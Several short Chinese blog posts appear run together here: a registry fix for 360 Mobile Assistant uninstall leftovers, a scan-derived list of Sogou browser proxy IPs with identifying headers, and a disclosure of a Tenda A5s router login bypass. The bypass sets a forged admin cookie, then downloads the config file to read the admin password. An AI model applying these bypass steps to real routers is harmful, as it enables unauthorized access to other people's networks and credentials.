之前以其他用户的身份卸载了“360手机助手”,发现有残留文件夹。
这可能是360手机助手卸载程序的一个BUG:A用户安装,B用户卸载,发现A用户残留。
如下图所示:
在命令提示符下输入regedit,打开注册表编辑器,找到Class ID:
HKEY_CLASSES_ROOT\CLSID\{0DC48F26-0203-4954-A848-5B3BC1353A72}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{0DC48F26-0203-4954-A848-5B3BC1353A72}
直接将上述注册表项删除,图中的文件夹随之移除。
前段时间很多同学反馈西工大的猫用不了了。
简单看了下新版搜狗浏览器,确实代理验证有变化。 于是修改代码,升级了程序。
搜狗的代理服务器是非常好扫到的,我小范围扫了几个段,就发现了30几个可用的IP地址。
根据HTTP Headers中的特征字符串判断即可:
Server:squid/2.6.STABLE22
Via:1.0 bjzw_36_46.sogou-in.domain:80 (squid/2.6.STABLE22)
X-Cache:MISS from bjzw_36_46.sogou-in.domain
HTTP服务器是squid,并且via域和X-Cache都有关键字sogou。
edu_servers = ['121.195.187.17', '121.195.187.21', '121.195.187.23',
'121.195.187.27', '121.195.187.19',]
unicom_servers = ['123.126.51.161', '123.126.51.163', '123.126.51.165',
'123.126.51.171', '123.126.51.173','123.126.51.169',
'123.126.51.167', '123.126.51.175', '123.126.51.168',
'123.126.51.166','123.126.51.162', '123.126.51.172',
'123.126.51.170', '123.126.51.174', '123.126.51.176',
'123.126.51.164',]
telecom_servers = ['220.181.118.155', '220.181.118.157', '220.181.118.161',
'220.181.118.158', '220.181.118.162', '220.181.118.166']
other_servers = ['106.120.151.2', '106.120.151.3', '106.120.151.6',
'106.120.151.8', '106.120.151.5', '106.120.151.9',
'106.120.151.10', '106.120.151.11']
前天在易迅买了个迷你路由器,腾达 A5s,比以前用的TP还小,是我用过的最小路由器。
穿墙效果一般。测试的时候发现web管理界面存在登陆绕过。
一般流程登陆后,程序会向浏览器写入如下Cookie:
admin:language=zh-cn
可以看到,连明文密码都没保存,更不要说Base64转码了。
利用的方式非常简单:
1) 在浏览器地址栏输入javascript:document.cookie=’admin:language=zh-cn’
2) 再次输入路由器IP,即可进入后台,例如,我的路由器:http://192.168.2.1/
3) 接着下载配置文件,可查看admin的密码:
http://192.168.2.1/cgi-bin/DownloadCfg/RouterCfm.cfg
局限是: 首先得连接到无线路由器。这意味着可能要WPA破解。